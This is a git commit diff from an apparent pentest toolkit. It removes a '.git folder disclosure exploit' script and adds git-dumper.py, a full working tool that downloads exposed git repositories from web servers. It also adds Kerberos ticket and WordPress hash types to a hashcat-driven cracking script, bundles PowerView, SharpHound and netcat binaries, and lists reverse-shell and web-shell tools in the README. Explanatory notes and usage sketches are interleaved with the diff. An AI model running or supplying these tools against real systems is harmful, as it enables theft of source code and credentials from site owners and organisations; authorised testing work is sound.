win binaries + git-dumper + crack_hash

Roman Hergenreder 2020-06-08 14:28:22 +02:00
parent 4c265dc683
commit 3f08063b4f
12 changed files with 21502 additions and 241 deletions

236
GitHack.py Deleted file

@@ -1,236 +0,0 @@
#!/usr/bin/env python
from urllib.parse import urlparse
import threading
import collections
import binascii
import requests
import struct
import zlib
import queue
import time
import ssl
import sys
import os
import re


def check(boolean, message):
    if not boolean:
        print("error: " + message)
        exit(1)
def parse(filename, pretty=True):
    with open(filename, "rb") as f:
        # f = mmap.mmap(o.fileno(), 0, access=mmap.ACCESS_READ)

        def read(format):
            # "All binary numbers are in network byte order."
            # Hence "!" = network order, big endian
            format = "! " + format
            bytes = f.read(struct.calcsize(format))
            return struct.unpack(format, bytes)[0]

        index = collections.OrderedDict()

        # 4-byte signature, b"DIRC"
        index["signature"] = f.read(4).decode("ascii")
        check(index["signature"] == "DIRC", "Not a Git index file")

        # 4-byte version number
        index["version"] = read("I")
        check(index["version"] in {2, 3},
              "Unsupported version: %s" % index["version"])

        # 32-bit number of index entries, i.e. 4-byte
        index["entries"] = read("I")

        yield index

        for n in range(index["entries"]):
            entry = collections.OrderedDict()
            entry["entry"] = n + 1

            entry["ctime_seconds"] = read("I")
            entry["ctime_nanoseconds"] = read("I")
            if pretty:
                entry["ctime"] = entry["ctime_seconds"]
                entry["ctime"] += entry["ctime_nanoseconds"] / 1000000000
                del entry["ctime_seconds"]
                del entry["ctime_nanoseconds"]

            entry["mtime_seconds"] = read("I")
            entry["mtime_nanoseconds"] = read("I")
            if pretty:
                entry["mtime"] = entry["mtime_seconds"]
                entry["mtime"] += entry["mtime_nanoseconds"] / 1000000000
                del entry["mtime_seconds"]
                del entry["mtime_nanoseconds"]

            entry["dev"] = read("I")
            entry["ino"] = read("I")

            # 4-bit object type, 3-bit unused, 9-bit unix permission
            entry["mode"] = read("I")
            if pretty:
                entry["mode"] = "%06o" % entry["mode"]

            entry["uid"] = read("I")
            entry["gid"] = read("I")
            entry["size"] = read("I")

            entry["sha1"] = binascii.hexlify(f.read(20)).decode("ascii")
            entry["flags"] = read("H")

            # 1-bit assume-valid
            entry["assume-valid"] = bool(entry["flags"] & (0b10000000 << 8))
            # 1-bit extended, must be 0 in version 2
            entry["extended"] = bool(entry["flags"] & (0b01000000 << 8))
            # 2-bit stage (?)
            stage_one = bool(entry["flags"] & (0b00100000 << 8))
            stage_two = bool(entry["flags"] & (0b00010000 << 8))
            entry["stage"] = stage_one, stage_two
            # 12-bit name length, if the length is less than 0xFFF (else, 0xFFF)
            namelen = entry["flags"] & 0xFFF

            # 62 bytes so far
            entrylen = 62

            if entry["extended"] and (index["version"] == 3):
                entry["extra-flags"] = read("H")
                # 1-bit reserved
                entry["reserved"] = bool(entry["extra-flags"] & (0b10000000 << 8))
                # 1-bit skip-worktree
                entry["skip-worktree"] = bool(entry["extra-flags"] & (0b01000000 << 8))
                # 1-bit intent-to-add
                entry["intent-to-add"] = bool(entry["extra-flags"] & (0b00100000 << 8))
                # 13-bits unused
                # used = entry["extra-flags"] & (0b11100000 << 8)
                # check(not used, "Expected unused bits in extra-flags")
                entrylen += 2

            if namelen < 0xFFF:
                entry["name"] = f.read(namelen).decode("utf-8", "replace")
                entrylen += namelen
            else:
                # Do it the hard way
                name = []
                while True:
                    byte = f.read(1)
                    if byte == b"\x00":
                        break
                    name.append(byte)
                entry["name"] = b"".join(name).decode("utf-8", "replace")
                entrylen += 1

            padlen = (8 - (entrylen % 8)) or 8
            nuls = f.read(padlen)
            check(set(nuls) == set([0]), "padding contained non-NUL")

            yield entry

        f.close()
class Scanner(object):
    def __init__(self):
        self.base_url = sys.argv[-1]
        self.domain = urlparse(sys.argv[-1]).netloc.replace(':', '_')
        if not os.path.exists(self.domain):
            os.mkdir(self.domain)
        print('[+] Download and parse index file ...')
        data = self._request_data(sys.argv[-1] + '/index')
        with open('%s/index' % self.domain, 'wb') as f:
            f.write(data)
        self.queue = queue.Queue()
        for entry in parse('%s/index' % self.domain):
            if "sha1" in entry.keys():
                self.queue.put((entry["sha1"].strip(), entry["name"].strip()))
                try:
                    print(entry['name'])
                except Exception as e:
                    pass
        self.lock = threading.Lock()
        self.thread_count = 20
        self.STOP_ME = False

    @staticmethod
    def _request_data(url):
        print(url)
        res = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)'})
        if res.status_code != 200:
            raise Exception("Server returned: %d %s" % (res.status_code, res.reason))
        return res.content

    def _print(self, msg):
        self.lock.acquire()
        try:
            print(msg)
        except Exception as e:
            pass
        self.lock.release()

    def get_back_file(self):
        while not self.STOP_ME:
            try:
                sha1, file_name = self.queue.get(timeout=0.5)
            except Exception as e:
                break
            try:
                folder = '/objects/%s/' % sha1[:2]
                data = self._request_data(self.base_url + folder + sha1[2:])
                try:
                    data = zlib.decompress(data)
                    data = re.sub(br'blob \d+\x00', b'', data)
                except:
                    # self._print('[Error] Fail to decompress %s' % file_name)
                    pass
                target_dir = os.path.join(self.domain, os.path.dirname(file_name))
                if target_dir and not os.path.exists(target_dir):
                    os.makedirs(target_dir)
                with open(os.path.join(self.domain, file_name), 'wb') as f:
                    f.write(data)
                self._print('[OK] %s' % file_name)
            except Exception as e:
                self._print('[Error] %s' % str(e))
        self.exit_thread()

    def exit_thread(self):
        self.lock.acquire()
        self.thread_count -= 1
        self.lock.release()

    def scan(self):
        for i in range(self.thread_count):
            t = threading.Thread(target=self.get_back_file)
            t.start()


if __name__ == '__main__':
    context = ssl._create_unverified_context()
    if len(sys.argv) == 1:
        msg = """
A `.git` folder disclosure exploit. By LiJieJie

Usage: GitHack.py http://www.target.com/.git/

bug-report: my[at]lijiejie.com (http://www.lijiejie.com)
"""
        print(msg)
        exit()
    s = Scanner()
    s.scan()
    try:
        while s.thread_count > 0:
            time.sleep(0.1)
    except KeyboardInterrupt as e:
        s.STOP_ME = True
        time.sleep(1.0)
        print('User Aborted.')
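
Note: this commit drops the bundled GitHack.py in favour of the upstream git-dumper.py added below. For reference, the parse() generator removed here reads a .git/index file directly and yields one dict per entry; a minimal sketch of driving it standalone (the local path target/.git/index is an assumed example, and parse() is the function from the removed script):

# sketch: list file names and blob SHA-1s from a downloaded index file
for entry in parse("target/.git/index"):
    # the first yielded dict is the header (signature/version/entries);
    # subsequent dicts are index entries carrying "name" and "sha1"
    if "sha1" in entry:
        print(entry["sha1"], entry["name"])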

@@ -3,10 +3,10 @@
This repository contains self-made and common scripts for information gathering, enumeration and more.
### Enumeration: Initial Scans
- first_scan.sh: Performs initial nmap scan (-A, -T5, -p-)
- first_scan.sh: Performs initial nmap scan
- gobuster.sh: Performs gobuster dir scan with raft-large-words-lowercase.txt
- ssh-check-username.py: Check if user enumeration works for ssh
- GitHack.py
- [git-dumper.py](https://github.com/arthaud/git-dumper)
- [autorecon.py](https://github.com/Tib3rius/AutoRecon)
- subdomainFuzz.sh: Fuzzes subdomains for a given domain
@@ -22,7 +22,7 @@ This repository contains self-made and common scripts for information gathering,
- genRevShell.py: Generates a reverse shell command (e.g. netcat, python, ...)
- [php-reverse-shell.php](https://github.com/pentestmonkey/php-reverse-shell)
- [p0wny-shell.php](https://github.com/flozz/p0wny-shell)
- [powercat.ps1][https://github.com/besimorhino/powercat]
- [powercat.ps1](https://github.com/besimorhino/powercat)
### Miscellaneous
- upload_file.py: Starts a local tcp server, for netcat usage

19
crack_hash.py Normal file → Executable file

@@ -21,6 +21,7 @@ class HashType(enum.Enum):
    RAW_MD5 = 0
    MD5_PASS_SALT = 10
    MD5_SALT_PASS = 20
    WORDPRESS = 400

    # SHA1
    RAW_SHA1 = 100
@@ -57,6 +58,11 @@ class HashType(enum.Enum):
    CRYPT_SHA512 = 1800
    CRYPT_APACHE = 1600

    # Kerberos
    KERBEROS_AS_REQ = 7500
    KERBEROS_TGS_REP = 13100
    KERBEROS_AS_REP = 18200

class Hash:
    def __init__(self, hash):
@@ -84,6 +90,14 @@ class Hash:
                self.type.append(HashType.CRYPT_SHA512)
            elif crypt_type == "apr1":
                self.type.append(HashType.CRYPT_APACHE)
            elif crypt_type == "krb5tgs":
                self.type.append(HashType.KERBEROS_TGS_REP)
            elif crypt_type == "krb5asreq":
                self.type.append(HashType.KERBEROS_AS_REQ)
            elif crypt_type == "krb5asrep":
                self.type.append(HashType.KERBEROS_AS_REP)
            elif crypt_type == "P":
                self.type.append(HashType.WORDPRESS)
        else:
            self.isSalted = ":" in raw_hash
            if self.isSalted:
@@ -144,6 +158,7 @@ if len(sys.argv) < 2:
    exit(1)
hashes = [Hash(x) for x in filter(None, [line.strip() for line in open(sys.argv[1],"r").readlines()])]
wordlist = "/usr/share/wordlists/rockyou.txt" if len(sys.argv) < 3 else sys.argv[2]
uncracked_hashes = { }
for hash in hashes:
@@ -156,7 +171,7 @@ for hash in hashes:

if len(uncracked_hashes) > 0:
    uncracked_types = list(uncracked_hashes.keys())
    num_types = len(uncracked_types)
    if num_types > 0:
    if num_types > 1:
        print("There are multiple uncracked hashes left with different hash types, choose one to proceed with hashcat:")
        print()
@@ -187,6 +202,6 @@ if len(uncracked_hashes) > 0:
        fp.write(b"%s\n" % hash.hash.encode("UTF-8"))
    fp.flush()

    proc = subprocess.Popen(["hashcat", "-m", str(selected_type.value), "-a", "0", fp.name, "/usr/share/wordlists/rockyou.txt", "--force"])
    proc = subprocess.Popen(["hashcat", "-m", str(selected_type.value), "-a", "0", fp.name, wordlist, "--force"])
    proc.wait()
    fp.close()
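
The new enum members map onto real hashcat modes: 13100 (Kerberos 5 TGS-REP etype 23), 18200 (AS-REP etype 23), 7500 (AS-REQ pre-authentication) and 400 (phpass, as used by WordPress); the second hunk also makes the optional wordlist argument reach the hashcat invocation instead of the hard-coded rockyou.txt path. A minimal sketch of the $-prefix detection the hunks add, separate from the script itself (example hash string is illustrative, not a real capture):

# sketch: map hashcat-style $prefix$ tags onto hashcat -m modes
PREFIX_TO_MODE = {
    "krb5tgs": 13100,    # Kerberos 5 TGS-REP etype 23 (kerberoasting)
    "krb5asrep": 18200,  # Kerberos 5 AS-REP etype 23 (AS-REP roasting)
    "krb5asreq": 7500,   # Kerberos 5 AS-REQ pre-auth etype 23
    "P": 400,            # phpass, used by WordPress/phpBB3
}

def guess_mode(h):
    # "$krb5tgs$23$..." -> split("$")[1] == "krb5tgs"
    if h.startswith("$"):
        return PREFIX_TO_MODE.get(h.split("$")[1])
    return None

assert guess_mode("$krb5tgs$23$*user$REALM$spn*$abcdef...") == 13100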

556
git-dumper.py Executable file

@@ -0,0 +1,556 @@
#!/usr/bin/env python3
from contextlib import closing
import argparse
import multiprocessing
import os
import os.path
import re
import socket
import subprocess
import sys
import urllib.parse

import urllib3
import bs4
import dulwich.index
import dulwich.objects
import dulwich.pack
import requests
import socks

USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"


def printf(fmt, *args, file=sys.stdout):
    if args:
        fmt = fmt % args

    file.write(fmt)
    file.flush()


def is_html(response):
    ''' Return True if the response is a HTML webpage '''
    return '<html>' in response.text


def get_indexed_files(response):
    ''' Return all the files in the directory index webpage '''
    html = bs4.BeautifulSoup(response.text, 'html.parser')
    files = []

    for link in html.find_all('a'):
        url = urllib.parse.urlparse(link.get('href'))

        if (url.path and
                url.path != '.' and
                url.path != '..' and
                not url.path.startswith('/') and
                not url.scheme and
                not url.netloc):
            files.append(url.path)

    return files


def create_intermediate_dirs(path):
    ''' Create intermediate directories, if necessary '''
    dirname, basename = os.path.split(path)

    if dirname and not os.path.exists(dirname):
        try:
            os.makedirs(dirname)
        except FileExistsError:
            pass  # race condition


def get_referenced_sha1(obj_file):
    ''' Return all the referenced SHA1 in the given object file '''
    objs = []

    if isinstance(obj_file, dulwich.objects.Commit):
        objs.append(obj_file.tree.decode())

        for parent in obj_file.parents:
            objs.append(parent.decode())
    elif isinstance(obj_file, dulwich.objects.Tree):
        for item in obj_file.iteritems():
            objs.append(item.sha.decode())
    elif isinstance(obj_file, dulwich.objects.Blob):
        pass
    else:
        printf('error: unexpected object type: %r\n' % obj_file, file=sys.stderr)
        sys.exit(1)

    return objs
class Worker(multiprocessing.Process):
''' Worker for process_tasks '''
def __init__(self, pending_tasks, tasks_done, args):
super().__init__()
self.daemon = True
self.pending_tasks = pending_tasks
self.tasks_done = tasks_done
self.args = args
def run(self):
# initialize process
self.init(*self.args)
# fetch and do tasks
while True:
task = self.pending_tasks.get(block=True)
if task is None: # end signal
return
result = self.do_task(task, *self.args)
assert isinstance(result, list), 'do_task() should return a list of tasks'
self.tasks_done.put(result)
def init(self, *args):
raise NotImplementedError
def do_task(self, task, *args):
raise NotImplementedError
def process_tasks(initial_tasks, worker, jobs, args=(), tasks_done=None):
''' Process tasks in parallel '''
if not initial_tasks:
return
tasks_seen = set(tasks_done) if tasks_done else set()
pending_tasks = multiprocessing.Queue()
tasks_done = multiprocessing.Queue()
num_pending_tasks = 0
# add all initial tasks in the queue
for task in initial_tasks:
assert task is not None
if task not in tasks_seen:
pending_tasks.put(task)
num_pending_tasks += 1
tasks_seen.add(task)
# initialize processes
processes = [worker(pending_tasks, tasks_done, args) for _ in range(jobs)]
# launch them all
for p in processes:
p.start()
# collect task results
while num_pending_tasks > 0:
task_result = tasks_done.get(block=True)
num_pending_tasks -= 1
for task in task_result:
assert task is not None
if task not in tasks_seen:
pending_tasks.put(task)
num_pending_tasks += 1
tasks_seen.add(task)
# send termination signal (task=None)
for _ in range(jobs):
pending_tasks.put(None)
# join all
for p in processes:
p.join()
class DownloadWorker(Worker):
    ''' Download a list of files '''

    def init(self, url, directory, retry, timeout):
        self.session = requests.Session()
        self.session.verify = False
        self.session.mount(url, requests.adapters.HTTPAdapter(max_retries=retry))

    def do_task(self, filepath, url, directory, retry, timeout):
        with closing(self.session.get('%s/%s' % (url, filepath),
                                      allow_redirects=False,
                                      stream=True,
                                      timeout=timeout,
                                      headers={"User-Agent": USER_AGENT})) as response:
            printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code)

            if response.status_code != 200:
                return []

            abspath = os.path.abspath(os.path.join(directory, filepath))
            create_intermediate_dirs(abspath)

            # write file
            with open(abspath, 'wb') as f:
                for chunk in response.iter_content(4096):
                    f.write(chunk)

            return []


class RecursiveDownloadWorker(DownloadWorker):
    ''' Download a directory recursively '''

    def do_task(self, filepath, url, directory, retry, timeout):
        with closing(self.session.get('%s/%s' % (url, filepath),
                                      allow_redirects=False,
                                      stream=True,
                                      timeout=timeout,
                                      headers={"User-Agent": USER_AGENT})) as response:
            printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code)

            if (response.status_code in (301, 302) and
                    'Location' in response.headers and
                    response.headers['Location'].endswith(filepath + '/')):
                return [filepath + '/']

            if response.status_code != 200:
                return []

            if filepath.endswith('/'):  # directory index
                assert is_html(response)

                return [filepath + filename for filename in get_indexed_files(response)]
            else:  # file
                abspath = os.path.abspath(os.path.join(directory, filepath))
                create_intermediate_dirs(abspath)

                # write file
                with open(abspath, 'wb') as f:
                    for chunk in response.iter_content(4096):
                        f.write(chunk)

                return []


class FindRefsWorker(DownloadWorker):
    ''' Find refs/ '''

    def do_task(self, filepath, url, directory, retry, timeout):
        response = self.session.get('%s/%s' % (url, filepath),
                                    allow_redirects=False,
                                    timeout=timeout,
                                    headers={"User-Agent": USER_AGENT})
        printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code)

        if response.status_code != 200:
            return []

        abspath = os.path.abspath(os.path.join(directory, filepath))
        create_intermediate_dirs(abspath)

        # write file
        with open(abspath, 'w') as f:
            f.write(response.text)

        # find refs
        tasks = []

        for ref in re.findall(r'(refs(/[a-zA-Z0-9\-\.\_\*]+)+)', response.text):
            ref = ref[0]
            if not ref.endswith('*'):
                tasks.append('.git/%s' % ref)
                tasks.append('.git/logs/%s' % ref)

        return tasks


class FindObjectsWorker(DownloadWorker):
    ''' Find objects '''

    def do_task(self, obj, url, directory, retry, timeout):
        filepath = '.git/objects/%s/%s' % (obj[:2], obj[2:])
        response = self.session.get('%s/%s' % (url, filepath),
                                    allow_redirects=False,
                                    timeout=timeout,
                                    headers={"User-Agent": USER_AGENT})
        printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code)

        if response.status_code != 200:
            return []

        abspath = os.path.abspath(os.path.join(directory, filepath))
        create_intermediate_dirs(abspath)

        # write file
        with open(abspath, 'wb') as f:
            f.write(response.content)

        # parse object file to find other objects
        obj_file = dulwich.objects.ShaFile.from_path(abspath)
        return get_referenced_sha1(obj_file)
def fetch_git(url, directory, jobs, retry, timeout):
    ''' Dump a git repository into the output directory '''
    assert os.path.isdir(directory), '%s is not a directory' % directory
    assert not os.listdir(directory), '%s is not empty' % directory
    assert jobs >= 1, 'invalid number of jobs'
    assert retry >= 1, 'invalid number of retries'
    assert timeout >= 1, 'invalid timeout'

    # find base url
    if not url.startswith("http://") and not url.startswith("https://"):
        url = "http://" + url
    url = url.rstrip('/')
    if url.endswith('HEAD'):
        url = url[:-4]
    url = url.rstrip('/')
    if url.endswith('.git'):
        url = url[:-4]
    url = url.rstrip('/')

    # check for /.git/HEAD
    printf('[-] Testing %s/.git/HEAD ', url)
    response = requests.get('%s/.git/HEAD' % url, verify=False, allow_redirects=False, headers={"User-Agent": USER_AGENT})
    printf('[%d]\n', response.status_code)

    if response.status_code != 200:
        printf('error: %s/.git/HEAD does not exist\n', url, file=sys.stderr)
        return 1
    elif not response.text.startswith('ref:'):
        printf('error: %s/.git/HEAD is not a git HEAD file\n', url, file=sys.stderr)
        return 1

    # check for directory listing
    printf('[-] Testing %s/.git/ ', url)
    response = requests.get('%s/.git/' % url, verify=False, allow_redirects=False, headers={"User-Agent": USER_AGENT})
    printf('[%d]\n', response.status_code)

    if response.status_code == 200 and is_html(response) and 'HEAD' in get_indexed_files(response):
        printf('[-] Fetching .git recursively\n')
        process_tasks(['.git/', '.gitignore'],
                      RecursiveDownloadWorker,
                      jobs,
                      args=(url, directory, retry, timeout))

        printf('[-] Running git checkout .\n')
        os.chdir(directory)
        subprocess.check_call(['git', 'checkout', '.'])
        return 0

    # no directory listing
    printf('[-] Fetching common files\n')
    tasks = [
        '.gitignore',
        '.git/COMMIT_EDITMSG',
        '.git/description',
        '.git/hooks/applypatch-msg.sample',
        '.git/hooks/applypatch-msg.sample',
        '.git/hooks/applypatch-msg.sample',
        '.git/hooks/commit-msg.sample',
        '.git/hooks/post-commit.sample',
        '.git/hooks/post-receive.sample',
        '.git/hooks/post-update.sample',
        '.git/hooks/pre-applypatch.sample',
        '.git/hooks/pre-commit.sample',
        '.git/hooks/pre-push.sample',
        '.git/hooks/pre-rebase.sample',
        '.git/hooks/pre-receive.sample',
        '.git/hooks/prepare-commit-msg.sample',
        '.git/hooks/update.sample',
        '.git/index',
        '.git/info/exclude',
        '.git/objects/info/packs',
    ]
    process_tasks(tasks,
                  DownloadWorker,
                  jobs,
                  args=(url, directory, retry, timeout))

    # find refs
    printf('[-] Finding refs/\n')
    tasks = [
        '.git/FETCH_HEAD',
        '.git/HEAD',
        '.git/ORIG_HEAD',
        '.git/config',
        '.git/info/refs',
        '.git/logs/HEAD',
        '.git/logs/refs/heads/master',
        '.git/logs/refs/remotes/origin/HEAD',
        '.git/logs/refs/remotes/origin/master',
        '.git/logs/refs/stash',
        '.git/packed-refs',
        '.git/refs/heads/master',
        '.git/refs/remotes/origin/HEAD',
        '.git/refs/remotes/origin/master',
        '.git/refs/stash',
        '.git/refs/wip/wtree/refs/heads/master',  # Magit
        '.git/refs/wip/index/refs/heads/master'   # Magit
    ]
    process_tasks(tasks,
                  FindRefsWorker,
                  jobs,
                  args=(url, directory, retry, timeout))

    # find packs
    printf('[-] Finding packs\n')
    tasks = []

    # use .git/objects/info/packs to find packs
    info_packs_path = os.path.join(directory, '.git', 'objects', 'info', 'packs')
    if os.path.exists(info_packs_path):
        with open(info_packs_path, 'r') as f:
            info_packs = f.read()

        for sha1 in re.findall(r'pack-([a-f0-9]{40})\.pack', info_packs):
            tasks.append('.git/objects/pack/pack-%s.idx' % sha1)
            tasks.append('.git/objects/pack/pack-%s.pack' % sha1)

    process_tasks(tasks,
                  DownloadWorker,
                  jobs,
                  args=(url, directory, retry, timeout))

    # find objects
    printf('[-] Finding objects\n')
    objs = set()
    packed_objs = set()

    # .git/packed-refs, .git/info/refs, .git/refs/*, .git/logs/*
    files = [
        os.path.join(directory, '.git', 'packed-refs'),
        os.path.join(directory, '.git', 'info', 'refs'),
        os.path.join(directory, '.git', 'FETCH_HEAD'),
        os.path.join(directory, '.git', 'ORIG_HEAD'),
    ]
    for dirpath, _, filenames in os.walk(os.path.join(directory, '.git', 'refs')):
        for filename in filenames:
            files.append(os.path.join(dirpath, filename))
    for dirpath, _, filenames in os.walk(os.path.join(directory, '.git', 'logs')):
        for filename in filenames:
            files.append(os.path.join(dirpath, filename))

    for filepath in files:
        if not os.path.exists(filepath):
            continue

        with open(filepath, 'r') as f:
            content = f.read()

        for obj in re.findall(r'(^|\s)([a-f0-9]{40})($|\s)', content):
            obj = obj[1]
            objs.add(obj)

    # use .git/index to find objects
    index_path = os.path.join(directory, '.git', 'index')
    if os.path.exists(index_path):
        index = dulwich.index.Index(index_path)

        for entry in index.iterblobs():
            objs.add(entry[1].decode())

    # use packs to find more objects to fetch, and objects that are packed
    pack_file_dir = os.path.join(directory, '.git', 'objects', 'pack')
    if os.path.isdir(pack_file_dir):
        for filename in os.listdir(pack_file_dir):
            if filename.startswith('pack-') and filename.endswith('.pack'):
                pack_data_path = os.path.join(pack_file_dir, filename)
                pack_idx_path = os.path.join(pack_file_dir, filename[:-5] + '.idx')
                pack_data = dulwich.pack.PackData(pack_data_path)
                pack_idx = dulwich.pack.load_pack_index(pack_idx_path)
                pack = dulwich.pack.Pack.from_objects(pack_data, pack_idx)

                for obj_file in pack.iterobjects():
                    packed_objs.add(obj_file.sha().hexdigest())
                    objs |= set(get_referenced_sha1(obj_file))

    # fetch all objects
    printf('[-] Fetching objects\n')
    process_tasks(objs,
                  FindObjectsWorker,
                  jobs,
                  args=(url, directory, retry, timeout),
                  tasks_done=packed_objs)

    # git checkout
    printf('[-] Running git checkout .\n')
    os.chdir(directory)

    # ignore errors
    subprocess.call(['git', 'checkout', '.'], stderr=open(os.devnull, 'wb'))

    return 0
if __name__ == '__main__':
    parser = argparse.ArgumentParser(usage='%(prog)s [options] URL DIR',
                                     description='Dump a git repository from a website.')
    parser.add_argument('url', metavar='URL',
                        help='url')
    parser.add_argument('directory', metavar='DIR',
                        help='output directory')
    parser.add_argument('--proxy',
                        help='use the specified proxy')
    parser.add_argument('-j', '--jobs', type=int, default=10,
                        help='number of simultaneous requests')
    parser.add_argument('-r', '--retry', type=int, default=3,
                        help='number of request attempts before giving up')
    parser.add_argument('-t', '--timeout', type=int, default=3,
                        help='maximum time in seconds before giving up')
    args = parser.parse_args()

    # jobs
    if args.jobs < 1:
        parser.error('invalid number of jobs')

    # retry
    if args.retry < 1:
        parser.error('invalid number of retries')

    # timeout
    if args.timeout < 1:
        parser.error('invalid timeout')

    # proxy
    if args.proxy:
        proxy_valid = False

        for pattern, proxy_type in [
                (r'^socks5:(.*):(\d+)$', socks.PROXY_TYPE_SOCKS5),
                (r'^socks4:(.*):(\d+)$', socks.PROXY_TYPE_SOCKS4),
                (r'^http://(.*):(\d+)$', socks.PROXY_TYPE_HTTP),
                (r'^(.*):(\d+)$', socks.PROXY_TYPE_SOCKS5)]:
            m = re.match(pattern, args.proxy)
            if m:
                socks.setdefaultproxy(proxy_type, m.group(1), int(m.group(2)))
                socket.socket = socks.socksocket
                proxy_valid = True
                break

        if not proxy_valid:
            parser.error('invalid proxy')

    # output directory
    if not os.path.exists(args.directory):
        os.makedirs(args.directory)

    if not os.path.isdir(args.directory):
        parser.error('%s is not a directory' % args.directory)

    if os.listdir(args.directory):
        parser.error('%s is not empty' % args.directory)

    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    # fetch everything
    code = fetch_git(args.url, args.directory, args.jobs, args.retry, args.timeout)
    path = os.path.realpath(args.directory)

    if not os.listdir(path):
        os.rmdir(path)

    sys.exit(code)
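
git-dumper.py (taken from arthaud/git-dumper, see the README link above) needs requests, beautifulsoup4, dulwich and PySocks installed, and is typically run as `./git-dumper.py http://target.example/.git/ website-dump` (the URL and output directory here are placeholder examples). After a dump, individual loose objects can be inspected with the same dulwich call FindObjectsWorker uses; a minimal sketch, with an assumed object path:

# sketch: inspect a dumped loose object the way the script does internally
import dulwich.objects

obj = dulwich.objects.ShaFile.from_path(
    "website-dump/.git/objects/ab/cdef0123456789abcdef0123456789abcdef0123")  # assumed example path
if isinstance(obj, dulwich.objects.Commit):
    print("commit, tree:", obj.tree.decode(), "parents:", [p.decode() for p in obj.parents])
elif isinstance(obj, dulwich.objects.Tree):
    print("tree entries:", [item.sha.decode() for item in obj.iteritems()])
elif isinstance(obj, dulwich.objects.Blob):
    print("blob, %d bytes" % len(obj.data))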

12
util.py

@@ -1,6 +1,7 @@
import random
import socket
import netifaces as ni
import sys
def getAddress(interface="tun0"):
    if not interface in ni.interfaces():

@@ -35,3 +36,14 @@ def openServer(address, ports=None):
            if not retry:
                print("Unable to listen on port %d: %s" % (listenPort, str(e)))
                raise e
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: %s [command]" % sys.argv[0])
        exit(1)

    if sys.argv[1] == "getAddress":
        if len(sys.argv) > 2:
            print(getAddress(sys.argv[2]))
        else:
            print(getAddress())
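
The new __main__ block turns util.py into a small CLI: `python3 util.py getAddress [interface]` prints the address bound to the given interface (default tun0). The body of getAddress is not shown in this hunk; presumably it resolves the interface's IPv4 address via netifaces, roughly like this sketch (an assumption, not the actual implementation):

# sketch: what getAddress(interface) presumably does with netifaces (assumption)
import netifaces as ni

def get_address(interface="tun0"):
    if interface not in ni.interfaces():
        return None
    # first IPv4 address bound to the interface
    return ni.ifaddresses(interface)[ni.AF_INET][0]["addr"]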

20914
win/PowerView.ps1 Normal file

File diff suppressed because it is too large

BIN
win/SharpHound.exe Normal file

Binary file not shown.

BIN
win/nc.exe Normal file

Binary file not shown.

BIN
win/nc64.exe Normal file

Binary file not shown.